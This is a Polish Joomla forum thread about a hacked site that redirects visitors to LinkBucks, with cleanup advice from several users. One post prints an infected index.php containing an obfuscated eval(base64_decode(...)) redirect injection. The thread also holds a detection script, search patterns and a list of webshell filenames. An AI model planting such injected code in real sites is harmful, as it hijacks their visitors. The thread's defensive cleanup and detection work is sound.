Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 13

Temat: Przekierowanie strony na LinkBucks(com)

  1. #1
    Debiutant
    Dołączył
    03-02-2013
    Wpisy
    4
    Punkty
    2

    Domyślny Przekierowanie strony na LinkBucks(com)

    Witam,
    Mam problem z witryną w Joomla 1,5-24PL. Witryna automatycznie przekierowuje się
    na stronę LinkBucks(com) Mniej więcej po 30 sekundach braku aktywności na stronie.
    Ostatnio dodawałem do strony dodatek - filmy Youtube.
    Film był wykonany w darmowym programame VirtualDub.
    Bardzo proszę o pomoc jak usunąć przekerowanie. Pozdrawiam

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wyga palyga007 awatar
    Dołączył
    24-03-2010
    Skąd
    Wieluń
    Wpisy
    3 782
    Punkty
    221

    Domyślny

    Wg mnie trzeba tutaj postępować zgodnie z procedurą przyjetą dla witryn po włamaniu.
    Procedura opisana na wiki.joomla.pl w dziale bezpieczeństwo o ile dobrze pamiętam
    ---------------------------------------------------------------------------------------------
    "Nie chowaj nienawiści po wieczne czasy, ty, który sam nie jesteś wieczny."
    Przyjmę ofertę pracy w Australii...

  4. #3
    Debiutant
    Dołączył
    12-12-2010
    Wpisy
    10
    Punkty
    9

    Domyślny

    Witam!
    Mam dokładnie ten sam problem. Prawdopodobnie to przez trojana jedengo z użytkowników, który wrzucał zdjęcia na stronę przez moduł phoca gallery. Męczę się już z tym parę dni. Czy autorowi udało się z nim uporać?

  5. #4
    Senior Bazyl awatar
    Dołączył
    02-08-2008
    Skąd
    Skierniewice
    Wpisy
    6 491
    Punkty
    455

    Domyślny

    Czytałeś, co jest napisane post wyżej?
    wiki - witryna po włamaniu

  6. #5
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 379
    Punkty
    241

    Domyślny

    Nie dalej jak wczoraj usuwałem skutki takiego ataku. Radzę bardzo dobrze sprawdzić wszystkie pliki. Niestety ja znalazłem sporo gif'ów ze złośliwym kodem.
    Przede wszystkim zrobić kopię tej zawirusowanej strony (żeby można ewentualnie później diagnozować co się stało).
    Koniecznie sprawdzić daty zmian/modyfikacji wszystkich plików (skrypt można znaleźć tutaj --> http://www.trzepizur.pl/blog/item/14...-by-hmei7.html)
    Aktualizacja Joomla! i wszystkich komponentów. Zmiana haseł do bazy, FTP, konta hostingowego, Panelu Administratora Joomla!.

    Koniecznie przeskanować sobie komputer jakimś antywirusem. Odciąć od Joomla! wszystkich innych administratorów na czas prac i sprawdzenia przez nich swoich komputerów.

    i jak napisali wyżej koledzy, przeczytać "Witryna po włamaniu"

  7. #6
    Debiutant
    Dołączył
    12-12-2010
    Wpisy
    10
    Punkty
    9

    Domyślny

    Cytat Wysłane przez Bazyl Zobacz wiadomość
    Czytałeś, co jest napisane post wyżej?
    wiki - witryna po włamaniu
    Tak się składa, że czytałem - poza tym to dwa posty wyżej o tym ktoś podobnie napisał więc nie ma sensu się powtarzać i niepotrzebnie generować posty, chyba że chcesz dać taką radę:

    Cytat Wysłane przez trzepiz Zobacz wiadomość
    Nie dalej jak wczoraj usuwałem skutki takiego ataku. Radzę bardzo dobrze sprawdzić wszystkie pliki. Niestety ja znalazłem sporo gif'ów ze złośliwym kodem.
    Przede wszystkim zrobić kopię tej zawirusowanej strony (żeby można ewentualnie później diagnozować co się stało).
    Koniecznie sprawdzić daty zmian/modyfikacji wszystkich plików (skrypt można znaleźć tutaj --> http://www.trzepizur.pl/blog/item/14...-by-hmei7.html)
    Aktualizacja Joomla! i wszystkich komponentów. Zmiana haseł do bazy, FTP, konta hostingowego, Panelu Administratora Joomla!.

    Koniecznie przeskanować sobie komputer jakimś antywirusem. Odciąć od Joomla! wszystkich innych administratorów na czas prac i sprawdzenia przez nich swoich komputerów.
    , za którą dziękuję użytkownikowi trzepiz, bo skryp "wypier.php" z jego linku to lek na całe zło szczególnie, że na mojej stronie od roku nie było istotnych zmian więc dzięki skryptowi odrazu widzałem, które plki są "nie halo".
    Wracając do turtorialu z wiki, to ogólnie konkluzja jest taka, że najbezpieczniej jest usunąć katalog public_html i postawić stronę od nowa, gdzie w przypadku mojej strony nie ma za bardzo sensu. Za to jest sens skorzystać ze skryptu "wypier.php". Ponadto uaktualniłem moduł jceeditor (zachodzi podejrzenie, że to przez niego skrypt dostał się na stronę) oraz samą joomlę.
    Jeszcze raz dzięki. Pozdr

  8. #7
    Debiutant
    Dołączył
    20-03-2013
    Wpisy
    1
    Punkty
    7

    Domyślny

    Nie wiem czy już sobie poradziłeś z tym problemem ale mnie dzisiaj spotkało to samo. Mi udało się załatwić to dość szybko.
    1. usunołem troszke plików z serwera moje zainfekowane pliki zwały się :
    w.php
    x.php
    z.php
    pp1.php
    i nie były tylko w katalogu głównym ale również w katalogach komponentów.

    /images/stories/susu.php
    tego pliku nie znalazłem u siebie, za to znalazłem zainfekowanego gifa o nazwie:
    000-aaz.gif

    Tak wygląda zainfekowany index.php

    to co zaznaczone na czerwono trzeba usunąć

    <?php
    /**
    * @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
    * @package Joomla
    * @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
    * @license GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */

    // Set flag that this is a parent file
    define( '_JEXEC', 1 );

    define('JPATH_BASE', dirname(__FILE__) );

    define( 'DS', DIRECTORY_SEPARATOR );

    require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
    eval(base64_decode('aGVhZGVyKCJSXDE0NVwxNDZcMTYyXH g2NXNceDY4XDA3Mlx4MjAyXHgzNTtcMDQwXDE2NVx4NzJcMTU0 XHgzZFwiXDE1MHR0XHg3MFwwNzIvL1x4NjZceDYzXHg2MmFceD cyXHg2M1wxNDVcMTU0XHg2Zlx4NmVhXHg2NFwxNTdceDY0XDE1 N2NcMTU3bVwwNTZcMTUxXHg2ZVx4NjZceDZmXDA1N1wxNDZceD cyXCIiKTs='));
    require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

    JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

    /**
    * CREATE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe =& JFactory::getApplication('site');

    /**
    * INITIALISE THE APPLICATION
    *
    * NOTE :
    */
    // set the language
    $mainframe->initialise();

    JPluginHelper::importPlugin('system');

    // trigger the onAfterInitialise events
    JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
    $mainframe->triggerEvent('onAfterInitialise');

    /**
    * ROUTE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->route();

    // authorization
    $Itemid = JRequest::getInt( 'Itemid');
    $mainframe->authorize($Itemid);

    // trigger the onAfterRoute events
    JDEBUG ? $_PROFILER->mark('afterRoute') : null;
    $mainframe->triggerEvent('onAfterRoute');

    /**
    * DISPATCH THE APPLICATION
    *
    * NOTE :
    */
    $option = JRequest::getCmd('option');
    $mainframe->dispatch($option);

    // trigger the onAfterDispatch events
    JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
    $mainframe->triggerEvent('onAfterDispatch');

    /**
    * RENDER THE APPLICATION
    *
    * NOTE :

    i wszystko wraca do normy

    a tutaj skrypcik który wykrywa wszystkie zainfekowane pliki wystarczy wkleić do notatnika i zapisać wrzucić na serwer i odpalić http://nazwastrony.pl/nazwaskrypru.php

    <html><head><title>Find Strings</title></head><body>
    <?php
    // ini_set('max_execution_time', '0');
    // ini_set('set_time_limit', '0');
    find_files('.');
    function find_files($seed) {
    if(! is_dir($seed)) return false;
    $files = array();
    $dirs = array($seed);
    while(NULL !== ($dir = array_pop($dirs)))
    {
    if($dh = opendir($dir))
    {
    while( false !== ($file = readdir($dh)))
    {
    if($file == '.' || $file == '..') continue;
    $path = $dir . '/' . $file;
    if(is_dir($path)) { $dirs[] = $path; }
    else { if(preg_match('/^.*\.(php[\d]?|txt|js|htaccess)$/i', $path)) { check_files($path); }}
    }
    closedir($dh);
    }
    }
    }
    function check_files($this_file)
    {
    $str_to_find[]='base64_decode';
    $str_to_find[]='edoced_46esab'; // base64_decode reversed
    $str_to_find[]='preg_replace';
    $str_to_find[]='HTTP_REFERER';
    $str_to_find[]='HTTP_USER_AGENT';

    if(!($content = file_get_contents($this_file)))
    { echo("<p>Could not check $this_file You should check the contents manually!</p>\n"); }
    else
    {
    while(list(,$value)=each($str_to_find))
    {
    if (stripos($content, $value) !== false)
    {
    echo("<p>$this_file -> zawiera $value</p>\n");
    }
    }
    }
    unset($content);
    }?>
    </body></html>

    A i jeszcze jedno na zagranicznych forach wyczytałem jeszcze kilka nazw zainfekowanych plików oto lista :


    • 0day.php
    • c99.php
    • config.root
    • css.php
    • en-gt.php
    • index.old.php
    • lib.php
    • maroc.php
    • r57.php
    • rc.php
    • story.php
    • tar.tmp
    • toy.php
    • web1.php
    • wh.php
    • Wos.php
    • xxu.php
    • xxx.php
    • zzzzx.php
    Ostanio edytowane przez divo27 : 20-03-2013 22:32

  9. #8
    Bywalec
    Dołączył
    31-08-2009
    Wpisy
    236
    Punkty
    10

    Domyślny

    Dodam tylko, że jest jeszcze drugi przypadek i wówczas najlepiej ściągnąć sobie witrynę na kompa i przejrzeć czy w katalogu głównym nie pojawiły się jakieś dziwne jpgi i gify. To samo należy uczynić z folderem images.

    Dodatkowo za pomocą np. Notepada ++ wyszukujemy frazę base64 i patrzymy, w których plikach są jakieś podejrzane wartości typu
    Kod PHP:
    return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); 
    Do zdekodowania hasha można posłużyć się tą stroną

    Mnie wykryło obecność plików
    p.php
    pp.php
    mod.php

    które oczywiście są do wywalenia

  10. #9
    Przeglądacz
    Dołączył
    06-05-2010
    Wpisy
    35
    Punkty
    10

    Domyślny

    Mnie też to spotkało moja strona www.parafiawysoka.pl, mam pytanie robiłem backup 2 miesiące temu czy mogę usunać cały katalog i przywrócić strone z backupu, czyw ten sposób usune wirusa?

  11. #10
    Bywalec
    Dołączył
    31-08-2009
    Wpisy
    236
    Punkty
    10

    Domyślny

    Jeśli backup jest stworzony z "czystej" kopii strony to tak. A jeśli kopia zawiera złośliwe pliki, to jedynym wyjściem jest wyczyszczenie katalogów i plików z nadmiarowego kodu.

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Samoczynne przekierowanie na nieistniejące strony
    przez rexo45 na forum Administracja - ogólne
    Odpowiedzi: 1
    Ostatni post/autor: 06-02-2013, 09:49
  2. Przekierowanie strony na nową domenę
    przez ayano na forum Administracja - ogólnie
    Odpowiedzi: 7
    Ostatni post/autor: 30-12-2012, 13:12
  3. Przekierowanie na podkatalog, a adres strony
    przez Obi13 na forum Wydajność, optymalizacja
    Odpowiedzi: 12
    Ostatni post/autor: 06-12-2009, 15:49
  4. podgląd strony i przekierowanie na stronę xamppa
    przez pawelk na forum Instalacje (Joomla!, składników)
    Odpowiedzi: 1
    Ostatni post/autor: 07-09-2009, 09:40
  5. automatyczne przekierowanie do strony postawionej na joomla!
    przez grzegorz.nowak na forum Instalacje (Joomla!, składników)
    Odpowiedzi: 1
    Ostatni post/autor: 02-09-2006, 14:51

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •